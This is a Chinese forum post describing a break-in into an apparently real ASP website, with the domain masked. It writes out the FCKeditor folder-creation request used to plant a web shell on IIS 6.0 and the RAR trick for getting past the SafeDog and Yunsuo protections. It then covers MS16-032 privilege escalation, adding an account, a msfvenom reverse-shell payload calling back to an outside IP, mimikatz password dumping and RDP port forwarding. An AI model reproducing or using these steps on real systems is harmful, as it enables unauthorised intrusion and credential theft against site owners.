找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 417|回复: 1

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
发表于 2018-10-20 20:31:43 | 显示全部楼层 |阅读模式

( ]1 w: N7 Z$ f8 M

$ ?) g- g) |+ [9 k1 b) L6 N' S1 k! S; e. x) g1 s5 p1 S' i2 J1 J M5 {9 K) L2 \, A) h7 o% B% l/ ]+ }7 u# L `. K' y5 Y7 X1 C
k& A8 N1 ~1 A7 `) H! @9 J

- q$ m% }- q. x
; v8 B* }# h2 }7 G' `
一、 利用getwebshell
5 }1 \+ n% B) j) m% @; p: t
! `( U, z D' j0 f$ T) Z8 Q
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
; |! e8 f m0 c& V+ q" k& e' E
" `+ S/ @: l- m( B222.png
* Y! [( {3 `: C: [
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
4 z8 I2 r" @# H% w9 m333.png
( R) t( D. _) e$ W9 ?) g. G
下面我们构造一个asp目录,如: 6 N9 s# Q, J; o: J$ N! r

/ U3 d/ |6 r) d2 O. ~ h) ?

8 D6 H/ R$ E- F- D* |. v http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 6 _3 B1 \/ Q; G9 C& J8 d

( w% x- B1 `; h. b

* V( b% c! q1 p0 t8 ? 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
( b# r I5 w) H# _! z+ `
' ]/ T- ~; g7 ]% S8 s' L+ C' l
一、 绕过安全狗云锁提权并且加账号
2 S* k& q% d7 J7 g2 ` 444.png
3 z+ n @- s& \' q
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
( c9 g- w. H2 q* r9 z! D
( O% a! W2 M/ _ D* }& c2 Q$ y
如图:
z" y6 V) a6 Z6 l+ y555.png
. Z% e ]+ a% N% b
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
, D) i. A/ t$ ?2 R$ r" f7 H
' S' e5 S% q8 P& m/ N
一、 利用metasploit
- z$ O% ~) y0 J$ J9 `8 J" K, _: l' Z; Y
/ q; l; J! [! b: B- j- h
首先用pentestbox生成一个64位的payload如下命令
* O& J$ S9 V n& C
) S- R1 A* u, i7 t4 Z0 PmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
0 p+ @; C+ M8 j8 P
7 `4 ^0 _1 s1 a( j7 |' J/ c8 `1 F' v
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
: M$ f# f; g0 S" C! u9 t11.png
1 G0 n# @+ m- ]
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
/ D0 }" U0 n; U6 N 13.png
0 x! ^+ \4 \( K- b
下面我们来做一个监听如下命令:
& c$ D) d/ p3 I! z& Y
, E" C9 h3 K0 S5 Y4 ]4 B7 I# \portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, Y# T, k3 Y% N9 C, x 18.png
: I# R& ]. a8 m$ F4 K6 [! r% ^

) a% J$ q1 ` U. w
- k% @" i2 D! A0 D

9 J' F2 x' S/ G: d. v, e

& b4 `+ G4 s4 q/ G R5 J7 p5 W
* p1 [6 G6 X& U
1 Q3 e3 @" h9 D, h. R; V
6 ^$ o# G+ z7 O9 r# v( Q# L* J, k

; [( A! Q. N' i2 W
8 Y y& H5 }0 k9 Y) [ 6 T' x8 o3 f3 L3 o/ K( T+ z( u

( T7 p1 a& l+ t% i$ O0 ~1 i* _. D
( U( i+ [# g2 w5 M

回复

使用道具 举报

匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表